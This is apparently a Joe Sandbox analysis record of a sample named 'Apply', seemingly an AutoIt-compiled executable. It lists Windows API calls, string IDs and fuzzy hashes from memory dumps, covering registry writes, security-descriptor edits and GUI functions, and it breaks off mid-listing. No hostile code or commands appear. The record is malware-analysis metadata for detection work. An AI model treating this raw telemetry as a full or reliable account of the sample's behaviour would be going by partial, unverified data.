                                                    • Instruction Fuzzy Hash: EA02F070108381AFD715CF26CC88BABBBE5FF86354F048918F594CA2A1D734D959DB91
                                                    APIs
                                                    • GetSysColor.USER32(00000012), ref: 008E7AEC
                                                    • SetTextColor.GDI32(?,?), ref: 008E7AF0
                                                    • GetSysColorBrush.USER32(0000000F), ref: 008E7B06
                                                    • GetSysColor.USER32(0000000F), ref: 008E7B11
                                                    • CreateSolidBrush.GDI32(?), ref: 008E7B16
                                                    • GetSysColor.USER32(00000011), ref: 008E7B2E
                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 008E7B3C
                                                    • SelectObject.GDI32(?,00000000), ref: 008E7B4D
                                                    • SetBkColor.GDI32(?,00000000), ref: 008E7B56
                                                    • SelectObject.GDI32(?,?), ref: 008E7B63
                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 008E7B82
                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 008E7B99
                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 008E7BA6
                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 008E7BF5
                                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 008E7C1F
                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 008E7C3D
                                                    • DrawFocusRect.USER32(?,?), ref: 008E7C48
                                                    • GetSysColor.USER32(00000011), ref: 008E7C59
                                                    • SetTextColor.GDI32(?,00000000), ref: 008E7C61
                                                    • DrawTextW.USER32(?,008E77C0,000000FF,?,00000000), ref: 008E7C73
                                                    • SelectObject.GDI32(?,?), ref: 008E7C8A
                                                    • DeleteObject.GDI32(?), ref: 008E7C95
                                                    • SelectObject.GDI32(?,?), ref: 008E7C9B
                                                    • DeleteObject.GDI32(?), ref: 008E7CA0
                                                    • SetTextColor.GDI32(?,?), ref: 008E7CA6
                                                    • SetBkColor.GDI32(?,?), ref: 008E7CB0
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                    • String ID:
                                                    • API String ID: 1996641542-0
                                                    • Opcode ID: 3458c1437062b77510159e4bbf7468d056945a80a0da6f31371494db51d4d5df
                                                    • Instruction ID: 69d184f0c2f8693aa3d73a5a5f7e56b9f2430efb0cf60dec4cea8d23a64adaf9
                                                    • Opcode Fuzzy Hash: 3458c1437062b77510159e4bbf7468d056945a80a0da6f31371494db51d4d5df
                                                    • Instruction Fuzzy Hash: D5613A72904258EFDB019FA8DC89EEEBBB9FB09320F114125F915AB2A0D7719944DB90
                                                    APIs
                                                    • GetCursorPos.USER32(?), ref: 008E18E2
                                                    • GetDesktopWindow.USER32 ref: 008E18F7
                                                    • GetWindowRect.USER32(00000000), ref: 008E18FE
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 008E1953
                                                    • DestroyWindow.USER32(?), ref: 008E1973
                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 008E19A7
                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 008E19C5
                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 008E19D7
                                                    • SendMessageW.USER32(00000000,00000421,?,?), ref: 008E19EC
                                                    • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 008E19FF
                                                    • IsWindowVisible.USER32(00000000), ref: 008E1A5B
                                                    • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 008E1A76
                                                    • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 008E1A8A
                                                    • GetWindowRect.USER32(00000000,?), ref: 008E1AA2
                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 008E1AC8
                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 008E1AE2
                                                    • CopyRect.USER32(?,?), ref: 008E1AF9
                                                    • SendMessageW.USER32(00000000,00000412,00000000), ref: 008E1B64
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                    • String ID: ($0$tooltips_class32
                                                    • API String ID: 698492251-4156429822
                                                    • Opcode ID: 9fad923085d05ed3aff471025263a48d035a19712f3da290cd9cf69efdc47d55
                                                    • Instruction ID: cf5324bc399b98a1f0b8b2126336c7a09c5f94bc1a93b7db23abda56f803746b
                                                    • Opcode Fuzzy Hash: 9fad923085d05ed3aff471025263a48d035a19712f3da290cd9cf69efdc47d55
                                                    • Instruction Fuzzy Hash: BFB1AE71604380AFDB04DF69C889B6BBBE4FF85354F008918F999DB261D731D848CB92
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?), ref: 008E0A9F
                                                    • _wcslen.LIBCMT ref: 008E0AD9
                                                    • _wcslen.LIBCMT ref: 008E0B43
                                                    • _wcslen.LIBCMT ref: 008E0BAB
                                                    • _wcslen.LIBCMT ref: 008E0C2F
                                                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 008E0C7F
                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 008E0CBE
                                                      • Part of subcall function 0086FD18: _wcslen.LIBCMT ref: 0086FD23
                                                      • Part of subcall function 008B2921: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 008B293A
                                                      • Part of subcall function 008B2921: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 008B296C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$MessageSend$BuffCharUpper
                                                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                    • API String ID: 1103490817-719923060
                                                    • Opcode ID: d3c1ed139e1d47664f3a97f1d22bf8bdaec38d6031796e4000fbdf5e1678c428
                                                    • Instruction ID: 22ad2cf483ba68f549465a608bddc30cc601be52e29cf7b21f7545197e7bd007
                                                    • Opcode Fuzzy Hash: d3c1ed139e1d47664f3a97f1d22bf8bdaec38d6031796e4000fbdf5e1678c428
                                                    • Instruction Fuzzy Hash: 4CE1BF312083458BC714DF29C45186AB3E6FF95358B148A6CF896DB3A2DB70ED85CF92
                                                    APIs
                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0085152D
                                                    • GetSystemMetrics.USER32(00000007), ref: 00851535
                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00851560
                                                    • GetSystemMetrics.USER32(00000008), ref: 00851568
                                                    • GetSystemMetrics.USER32(00000004), ref: 0085158D
                                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 008515AA
                                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 008515BA
                                                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 008515ED
                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00851601
                                                    • GetClientRect.USER32(00000000,000000FF), ref: 0085161F
                                                    • GetStockObject.GDI32(00000011), ref: 0085163B
                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00851646
                                                      • Part of subcall function 0085135A: GetCursorPos.USER32(?), ref: 0085136E
                                                      • Part of subcall function 0085135A: ScreenToClient.USER32(00000000,?), ref: 0085138B
                                                      • Part of subcall function 0085135A: GetAsyncKeyState.USER32(00000001), ref: 008513C2
                                                      • Part of subcall function 0085135A: GetAsyncKeyState.USER32(00000002), ref: 008513DC
                                                    • SetTimer.USER32(00000000,00000000,00000028,00869421), ref: 0085166D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                    • String ID: AutoIt v3 GUI
                                                    • API String ID: 1458621304-248962490
                                                    • Opcode ID: 55b04b3f546d13d1f7d5f2101d68e77399d3879c91d233f046052d9bc43f181f
                                                    • Instruction ID: 82842479ce6a89f490dcc0089bf365f767e2ae19b7f6e6c889cd8d3c4f6fac43
                                                    • Opcode Fuzzy Hash: 55b04b3f546d13d1f7d5f2101d68e77399d3879c91d233f046052d9bc43f181f
                                                    • Instruction Fuzzy Hash: 31B15B31A00209AFDF14EFA8CC89BAA7BB5FB48315F114219FA15EB290DB74D845CF51
                                                    APIs
                                                      • Part of subcall function 008B17DB: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 008B17F6
                                                      • Part of subcall function 008B17DB: GetLastError.KERNEL32(?,00000000,00000000,?,?,008B127D,?,?,?), ref: 008B1802
                                                      • Part of subcall function 008B17DB: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,008B127D,?,?,?), ref: 008B1811
                                                      • Part of subcall function 008B17DB: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,008B127D,?,?,?), ref: 008B1818
                                                      • Part of subcall function 008B17DB: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 008B182F
                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 008B14D7
                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 008B150B
                                                    • GetLengthSid.ADVAPI32(?), ref: 008B1522
                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 008B155C
                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 008B1578
                                                    • GetLengthSid.ADVAPI32(?), ref: 008B158F
                                                    • GetProcessHeap.KERNEL32(00000008,00000008), ref: 008B1597
                                                    • HeapAlloc.KERNEL32(00000000), ref: 008B159E
                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 008B15BF
                                                    • CopySid.ADVAPI32(00000000), ref: 008B15C6
                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 008B15F5
                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 008B1617
                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 008B1629
                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008B1650
                                                    • HeapFree.KERNEL32(00000000), ref: 008B1657
                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008B1660
                                                    • HeapFree.KERNEL32(00000000), ref: 008B1667
                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008B1670
                                                    • HeapFree.KERNEL32(00000000), ref: 008B1677
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 008B1683
                                                    • HeapFree.KERNEL32(00000000), ref: 008B168A
                                                      • Part of subcall function 008B1875: GetProcessHeap.KERNEL32(00000008,008B1293,?,00000000,?,008B1293,?), ref: 008B1883
                                                      • Part of subcall function 008B1875: HeapAlloc.KERNEL32(00000000,?,00000000,?,008B1293,?), ref: 008B188A
                                                      • Part of subcall function 008B1875: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,008B1293,?), ref: 008B1899
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                    • String ID:
                                                    • API String ID: 4175595110-0
                                                    • Opcode ID: 695b8b9892f3b171c3b12c70a74766e8baa4149d0966ae7aa77ff4f745b03ad7
                                                    • Instruction ID: 0961fb0115ee905c07291901c0f4e7a01b37d6245bac2fb679daeab668a31e99
                                                    • Opcode Fuzzy Hash: 695b8b9892f3b171c3b12c70a74766e8baa4149d0966ae7aa77ff4f745b03ad7
                                                    • Instruction Fuzzy Hash: 637149B6900209ABDF109FA4DC88BEEBBB8FF15310F484115F915EB291D7319A05CBA0
                                                    APIs
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008DCC44
                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,008EDC1C,00000000,?,00000000,?,?), ref: 008DCCCB
                                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 008DCD2B
                                                    • _wcslen.LIBCMT ref: 008DCD7B
                                                    • _wcslen.LIBCMT ref: 008DCDF6
                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 008DCE39
                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 008DCF48
                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 008DCFD4
                                                    • RegCloseKey.ADVAPI32(?), ref: 008DD008
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 008DD015
                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 008DD0E7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                    • API String ID: 9721498-966354055
                                                    • Opcode ID: 37ac72597f636b1867a30160ff9bc7a28df170d3f23048601d2216187887b17f
                                                    • Instruction ID: 11a7c295c2103beb6a4d36a61a55cf6798fa288e0b0636e4a4ff8a611513b991
                                                    • Opcode Fuzzy Hash: 37ac72597f636b1867a30160ff9bc7a28df170d3f23048601d2216187887b17f
                                                    • Instruction Fuzzy Hash: DE1227352046019FCB15DF18C881A2AB7E6FF88714F14859DF85ADB3A2DB31ED46CB82
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?), ref: 008E1180
                                                    • _wcslen.LIBCMT ref: 008E11BB
                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 008E120E
                                                    • _wcslen.LIBCMT ref: 008E1244
                                                    • _wcslen.LIBCMT ref: 008E12C0
                                                    • _wcslen.LIBCMT ref: 008E133B
                                                      • Part of subcall function 0086FD18: _wcslen.LIBCMT ref: 0086FD23
                                                      • Part of subcall function 008B32CA: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 008B32DC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$MessageSend$BuffCharUpper
                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                    • API String ID: 1103490817-4258414348
                                                    • Opcode ID: 34e63b84f8c0b09e354e54ed180059645ef2eeb590d003be588befafb02386b3
                                                    • Instruction ID: 430b495fd18d1696e42d0c925eaacd1caeb58b553875d2699a9d14aed6677344
                                                    • Opcode Fuzzy Hash: 34e63b84f8c0b09e354e54ed180059645ef2eeb590d003be588befafb02386b3
                                                    • Instruction Fuzzy Hash: 1EE19D352087818FCB14DF2AC44586AB7E2FF95314B54895CF896DB7A2DB30ED49CB82
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$BuffCharUpper
                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                    • API String ID: 1256254125-909552448
                                                    • Opcode ID: a82a39ae359b545556172d316fadc6f240882d28a38b6b9796dba2d0b9c2931e
                                                    • Instruction ID: 01472b27dc2281b809414783a4aadf6ea800f2800f196985cb74f5c0189f0f1d
                                                    • Opcode Fuzzy Hash: a82a39ae359b545556172d316fadc6f240882d28a38b6b9796dba2d0b9c2931e
                                                    • Instruction Fuzzy Hash: BB71B032A0072A8BCB20DE6C8D419FA3395FB60754B21472AEC65DB384EA31EE45C691
                                                    APIs
                                                    • _wcslen.LIBCMT ref: 008E8A46
                                                    • _wcslen.LIBCMT ref: 008E8A5A
                                                    • _wcslen.LIBCMT ref: 008E8A7D
                                                    • _wcslen.LIBCMT ref: 008E8AA0
                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 008E8ADE
                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,008E63B2), ref: 008E8B3A
                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 008E8B73
                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 008E8BB6
                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 008E8BED
                                                    • FreeLibrary.KERNEL32(?), ref: 008E8BF9
                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 008E8C09
                                                    • DestroyIcon.USER32(?,?,?,?,?,008E63B2), ref: 008E8C18
                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 008E8C35
                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 008E8C41
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                    • String ID: .dll$.exe$.icl
                                                    • API String ID: 799131459-1154884017
                                                    • Opcode ID: c9c8e3f5580756040b633fe3e6445ffb27749cec3b9de229f0c4a39ac8448004
                                                    • Instruction ID: c9fc8cff5707e99b9ca047c20aaa26b9dfbb54891dd74d490e2cebf921718e4e
                                                    • Opcode Fuzzy Hash: c9c8e3f5580756040b633fe3e6445ffb27749cec3b9de229f0c4a39ac8448004
                                                    • Instruction Fuzzy Hash: 0B61E071500659FBEB14DF65CC81BBE77A8FB09724F108106F919DA0D1DB74AA84CBA0
                                                    APIs
                                                    • CharLowerBuffW.USER32(?,?), ref: 008C4667
                                                    • _wcslen.LIBCMT ref: 008C4672
                                                    • _wcslen.LIBCMT ref: 008C46C9
                                                    • _wcslen.LIBCMT ref: 008C4707
                                                    • GetDriveTypeW.KERNEL32(?), ref: 008C4745
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008C478D
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008C47C8
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008C47F6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                    • API String ID: 1839972693-4113822522
                                                    • Opcode ID: e24ce8514d1c66761b7d22954f07ab479315969da53a30b4656e774f976aad5a
                                                    • Instruction ID: 6c72b53e7453962b66c2eb2fcff699b96c4484525a6d04c44b59956bb07bab9e
                                                    • Opcode Fuzzy Hash: e24ce8514d1c66761b7d22954f07ab479315969da53a30b4656e774f976aad5a
                                                    • Instruction Fuzzy Hash: CA719C326083169FC710EF28C8A196AB7F4FF94758B50892DF896D7251E730DD89CB92
                                                    APIs
                                                    • LoadIconW.USER32(00000063), ref: 008B6127
                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 008B6139
                                                    • SetWindowTextW.USER32(?,?), ref: 008B6150
                                                    • GetDlgItem.USER32(?,000003EA), ref: 008B6165
                                                    • SetWindowTextW.USER32(00000000,?), ref: 008B616B
                                                    • GetDlgItem.USER32(?,000003E9), ref: 008B617B
                                                    • SetWindowTextW.USER32(00000000,?), ref: 008B6181
                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 008B61A2
                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 008B61BC
                                                    • GetWindowRect.USER32(?,?), ref: 008B61C5
                                                    • _wcslen.LIBCMT ref: 008B622C
                                                    • SetWindowTextW.USER32(?,?), ref: 008B6268
                                                    • GetDesktopWindow.USER32 ref: 008B626E
                                                    • GetWindowRect.USER32(00000000), ref: 008B6275
                                                    • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 008B62CC
                                                    • GetClientRect.USER32(?,?), ref: 008B62D9
                                                    • PostMessageW.USER32(?,00000005,00000000,?), ref: 008B62FE
                                                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 008B6328
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                    • String ID:
                                                    • API String ID: 895679908-0
                                                    • Opcode ID: 6271535eeebe6adef3d112eb8891512d0850491581119ba7ff0a01b6b68f2e82
                                                    • Instruction ID: 404757698599039391265f6fef0c2906736d860d21c39bafdbe47f5c65b54c32
                                                    • Opcode Fuzzy Hash: 6271535eeebe6adef3d112eb8891512d0850491581119ba7ff0a01b6b68f2e82
                                                    • Instruction Fuzzy Hash: 4B717131900709EFDB20DFA8CE85AAEBBF5FF48704F104528E546E66A0E779E954CB50
                                                    APIs
                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 008D05AE
                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 008D05B9
